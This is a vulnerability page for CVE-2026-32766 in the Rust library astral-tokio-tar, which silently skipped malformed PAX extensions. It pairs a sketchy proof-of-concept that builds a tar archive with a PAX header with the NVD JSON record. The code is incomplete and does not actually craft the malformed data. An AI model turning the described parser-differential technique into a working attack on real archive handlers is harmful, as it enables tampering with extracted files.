CVE-2026-32766

// PoC for CVE-2026-32766: Malformed PAX Extension Handling // This example demonstrates how a malformed PAX header might be constructed. // Vulnerable versions of astral-tokio-tar would skip this silently. use tokio_tar::{Builder, Header}; use std::io::Cursor; #[tokio::main] async fn main() -> Result<(), Box<dyn std::error::Error>> { let mut ar = Builder::new(Vec::new()); // Create a standard file entry let mut header = Header::new_gnu(); header.set_path("legitimate_file.txt"); header.set_size(0); header.set_cksum(); ar.append(&header, &mut Cursor::new(&[])).await?; // Simulate appending a malformed PAX extension // In a real exploit, specific bytes would be crafted to trigger // differential parsing in a secondary parser. let mut pax_header = Header::new_gnu(); pax_header.set_entry_type(tokio_tar::EntryType::X); // PAX header type // Set a size that implies the presence of PAX attributes pax_header.set_size(50); // In a vulnerable version, if the subsequent bytes are malformed, // tokio-tar would skip this entry without error. // Note: Actual exploitation requires a secondary parser that // interprets this skipped data maliciously. println!("CVE-2026-32766 PoC: Archive with PAX extension created."); Ok(()) }

{"cve": {"id": "CVE-2026-32766", "sourceIdentifier": "[email protected]", "published": "2026-03-20T00:16:18.100", "lastModified": "2026-04-17T21:09:16.900", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "astral-tokio-tar is a tar archive reading/writing library for async Rust. In versions 0.5.6 and earlier, malformed PAX extensions were silently skipped when parsing tar archives. This silent skipping (rather than rejection) of invalid PAX extensions could be used as a building block for a parser differential, for example by silently skipping a malformed GNU “long link” extension so that a subsequent parser would misinterpret the extension. In practice, exploiting this behavior in astral-tokio-tar requires a secondary misbehaving tar parser, i.e. one that insufficiently validates malformed PAX extensions and interprets them rather than skipping or erroring on them. This vulnerability is considered low-severity as it requires a separate vulnerability against any unrelated tar parser. This issue has been fixed in version 0.6.0."}, {"lang": "es", "value": "astral-tokio-tar es una biblioteca de lectura/escritura de archivos tar para Rust asíncrono. En las versiones 0.5.6 y anteriores, las extensiones PAX malformadas se omitían silenciosamente al analizar archivos tar. Esta omisión silenciosa (en lugar de rechazo) de extensiones PAX no válidas podría usarse como un bloque de construcción para un diferencial de analizador, por ejemplo, omitiendo silenciosamente una extensión GNU 'long link' malformada para que un analizador posterior malinterpretara la extensión. En la práctica, explotar este comportamiento en astral-tokio-tar requiere un analizador tar secundario con comportamiento incorrecto, es decir, uno que valide insuficientemente las extensiones PAX malformadas y las interprete en lugar de omitirlas o generar un error por ellas. Esta vulnerabilidad se considera de baja gravedad ya que requiere una vulnerabilidad separada contra cualquier analizador tar no relacionado. Este problema ha sido corregido en la versión 0.6.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-436"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:astral:astral-tokio-tar:*:*:*:*:*:rust:*:*", "versionEndExcluding": "0.6.0", "matchCriteriaId": "725A3E2E-B367-4AE8-AD96-B93A99C035F8"}]}]}], "references": [{"url": "https://github.com/astral-sh/tokio-tar/commit/e5e0139cae4577eeedf5fc16b65e690bf988ce52", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/astral-sh/tokio-tar/security/advisories/GHSA-6gx3-4362-rf54", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}